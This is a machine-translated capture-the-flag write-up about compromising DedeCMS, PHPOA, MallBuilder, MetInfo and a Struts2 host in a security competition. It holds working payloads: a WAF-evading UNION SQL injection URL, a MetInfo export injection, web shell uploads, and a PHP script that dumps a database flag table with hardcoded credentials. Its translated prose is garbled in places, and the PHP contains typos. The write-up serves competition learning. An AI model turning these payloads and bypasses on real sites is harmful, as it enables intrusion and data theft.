"Security think tank": 48H quickly win the Flag War Customs clearance writeup (Customs policy)

bystudent

Title Name	Topic Score	Address
MallBuilder2	350	mall.anquanbao.com.cn
MallBuilder1	200	mall.anquanbao.com.cn
DedeCMS2	300	cms.anquanbao.com.cn
DedeCMS1	200	cms.anquanbao.com.cn
MetInfo2	300	info.anquanbao.com.cn
MetInfo1	200	info.anquanbao.com.cn
PHPOA2	200	oa.anquanbao.com.cn
PHPOA1	150	oa.anquanbao.com.cn
BugScan1	500	scan.anquanbao.com.cn

0x01 Dedecms

First saw the weaving dream, direct admin 123456 Log in, found that the left is blank.

Access File Manager directly from a file.

/dede/file_manage_main.php?activepath=/uploads

Found the first flag in the root directory, and then found that others are instantly 750 points, and then looked at the next flag.txt, get three flag.

Upload and the like are not, directly write a pht seconds. But the server special card, is also drunk, a word not even on, on a big horse, and then find the database configuration file, found after found unreadable. Is stuck when found flag.txt was deleted, background password has been changed, so ah, changed the backstage, deleted a lot of important documents.

Finally found that the file is 777, and then changed the config to. txt, and then read the configuration file.

But the WAF is strong.

Can log into the database, you can see the table Dede_flag, but is unable to read the data, simply write a php file read it.

0x02 Phpoa

This cloud has cases, with scripts, arbitrary file upload. Directly to a big horse, this database can be read directly, read and then write a PHP file read the database flag.

Case Portal:

http://www.wooyun.org/bugs/wooyun-2010-163275

But now (when writing writeup) The above method is no longer available, a lot of things are filtered, but you can pass a sentence, and then post so read.

Then write the file to read flag.

getflag.php

<?php

$con = mysql_connect ("localhost", "root", "2C2984BG");

$db _selected = mysql_selecst_db ("flag", $con);

$sql = "SELECT * from flag";

$result = mysql_query ($sql, $con);

while ($row = Mysql_fetch_array ($result)) {

Var_dump ($row);

}

Mysql_free_result ($result);

Mysql_close ($con);

?>

0x03 Mallbuilder

Flag.txt this time can not access, access to 405, casually add a post to bypass.

The cloud was searched, and the Mallbuilder parameter brand injection vulnerability was found.

http://www.wooyun.org/bugs/wooyun-2010-0176842

But can only read the file, how also around the WAF, security Bao is very tough ah, everything is 405.

Then an article was searched, using decimals to bypass the space.

http://wooyun.org/bugs/wooyun-2010-0157857

Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23

Ultimate payload

Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a 1,2,3,4,5, (select name Fromflag), 7,8,9,10,user (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23

0x04 Metinfo

Metinfo 5.2.4, this is a dark cloud case: Metinfo Latest Version (5.2.4) a SQL blind vulnerability

http://www.wooyun.org/bugs/wooyun-2014-055338

The simplest way to do this is to change the table name to flag and then download an Excel table that opens flag because flag is set to the table name ... Orz

http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1& Settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter

0x05 Bugscan

This is the first random try, tomcat/7.0.68. Found this:

Http://scan.anquanbao.com.cn/memoedit.action

Speculation is Struts2, with tools tested, there is a s2-032, but the WAF intercept command execution.

Tried a lot of ways to bypass the way around, no matter what all interception, is also a wonderful Ah, finally helpless, or with the most traditional method: The long URL around the past, 100w+. Flag is under the root directory.

© This article is for the original author of "Security Think tank", reproduced please specify copyright.

"Security think tank": 48H quickly win the Flag War Customs clearance writeup (Customs policy)